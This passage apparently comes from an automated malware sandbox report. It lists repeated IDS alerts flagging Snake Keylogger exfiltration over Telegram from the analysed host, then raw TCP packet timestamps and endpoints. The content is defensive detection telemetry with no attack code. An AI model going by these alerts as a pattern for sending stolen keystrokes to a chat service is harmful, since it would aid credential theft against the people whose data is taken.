                                                                                                                      2024-12-18T16:17:57.380673+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549911149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:57.573416+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549913149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:57.635179+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549912149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:59.375673+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549919149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:59.580713+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549920149.154.167.220443TCP
                                                                                                                      2024-12-18T16:17:59.639880+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549921149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:01.318425+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549926149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:01.571029+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549928149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:01.603400+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549929149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:03.392072+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549934149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:03.529800+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549936149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:03.666271+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549937149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:05.349537+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549941149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:05.443772+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549943149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:05.612499+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549944149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:07.581908+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549949149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:07.680349+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549950149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:07.704153+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549952149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:09.708901+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549958149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:09.773344+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549959149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:09.810147+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549960149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:11.797610+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549966149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:11.812814+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549968149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:11.853841+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549967149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:14.047343+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549973149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:14.100657+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549974149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:14.154114+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549976149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:15.983634+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549982149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:16.111926+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549983149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:16.152443+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549984149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:17.915743+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549989149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:18.073303+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549990149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:18.111085+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549991149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:19.846297+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549997149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:20.045944+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549998149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:20.076195+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.549999149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:21.927558+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550004149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:22.092437+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550005149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:22.120855+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550007149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:24.287503+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550014149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:24.288171+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550012149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:24.288771+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550013149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:26.252702+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550020149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:26.311353+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550022149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:26.366662+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550021149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:28.288311+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550028149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:28.333244+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550029149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:28.371274+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550030149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:30.205741+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550037149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:30.323151+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550038149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:30.356116+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550039149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:32.166367+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550044149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:32.380021+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550045149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:32.422146+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550046149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:34.245957+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550049149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:34.375883+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550052149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:34.414007+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550053149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:36.176798+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550057149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:36.335163+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550058149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:36.367743+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550059149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:38.112744+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550065149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:38.317119+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550066149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:38.348443+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550067149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:40.032364+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550072149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:40.250609+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550073149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:40.297416+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550074149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:41.997405+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550080149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:42.351105+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550081149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:42.395242+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550082149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:43.931774+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550087149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:44.349926+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550089149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:45.072902+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550090149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:45.842958+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550094149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:46.296362+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550096149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:47.101890+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550098149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:51.477554+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550100149.154.167.220443TCP
                                                                                                                      2024-12-18T16:18:51.722173+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.550104149.154.167.220443TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 18, 2024 16:16:39.612137079 CET49714443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:39.612190008 CET44349714185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:39.612343073 CET49714443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:39.612550974 CET49714443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:39.612651110 CET44349714185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:39.612931967 CET49714443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:39.644778967 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:39.644812107 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:39.644937038 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:39.646501064 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:39.646512032 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:41.243875980 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:41.243952990 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:41.307271004 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:41.307284117 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:41.308228016 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:41.354794025 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:41.389704943 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:41.431334019 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:41.957962036 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:41.958028078 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:41.958111048 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:41.958125114 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:41.958153009 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:41.958178997 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:41.958230972 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:41.959863901 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:41.959878922 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:41.959893942 CET49715443192.168.2.5185.166.143.49
                                                                                                                      Dec 18, 2024 16:16:41.959901094 CET44349715185.166.143.49192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:42.343116045 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:42.343178988 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:42.343256950 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:42.343728065 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:42.343745947 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:43.767878056 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:43.767945051 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:43.773580074 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:43.773592949 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:43.774008036 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:43.775763035 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:43.819361925 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.233205080 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.278816938 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.283555984 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.283581018 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.283627033 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.283663988 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.283695936 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.283723116 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.283751965 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.283751965 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.283777952 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.283823967 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.638253927 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.638297081 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.638350010 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.638410091 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.638438940 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.638498068 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.638524055 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.639440060 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.647202015 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.647258043 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.647295952 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.647308111 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.647366047 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.647397041 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.647444010 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.648361921 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.648428917 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.652345896 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.652455091 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.652466059 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.693881989 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.784024954 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.784054041 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.784178019 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.784215927 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.784272909 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.791850090 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.816772938 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.816827059 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.816855907 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.816885948 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.816904068 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.847604990 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.847683907 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.847688913 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.847717047 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.847749949 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.877177000 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.877229929 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.877247095 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.877259016 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.877290964 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.905311108 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.905371904 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.905394077 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.905405998 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.905658960 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.905690908 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.935674906 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.935728073 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.935748100 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.935759068 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.935792923 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.935817957 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.963768005 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.963797092 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.963865995 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.963869095 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.963911057 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.963922024 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.963936090 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.964164019 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.964191914 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.964251041 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.985374928 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.985398054 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.985549927 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.985579967 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.985596895 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.985601902 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:44.985644102 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.985671997 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:44.988004923 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.005600929 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.005649090 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.005686998 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.005695105 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.005736113 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.017383099 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.017421961 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.017478943 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.017483950 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.017541885 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.017584085 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.017648935 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.028642893 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.028665066 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.028738976 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.028750896 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.028840065 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.029731989 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.039007902 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.039028883 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.039083958 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.039091110 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.039119005 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.048949957 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.049021959 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.049051046 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.049067974 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.049141884 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.059407949 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.059534073 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.059545040 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.059571981 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.059614897 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.059659958 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.069777012 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.069823980 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.069859028 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.069866896 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.069906950 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.069924116 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.070888042 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.079355001 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.079400063 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.079437017 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.079444885 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.079478979 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.089523077 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.089648008 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.089674950 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.089766979 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.193451881 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.201395988 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.201447964 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.201484919 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.201519966 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.201538086 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.208966017 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.209023952 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.209047079 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.209058046 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.209121943 CET49716443192.168.2.552.217.32.148
                                                                                                                      Dec 18, 2024 16:16:45.217822075 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.217875004 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.217912912 CET4434971652.217.32.148192.168.2.5
                                                                                                                      Dec 18, 2024 16:16:45.217938900 CET49716443192.168.2.552.217.32.148
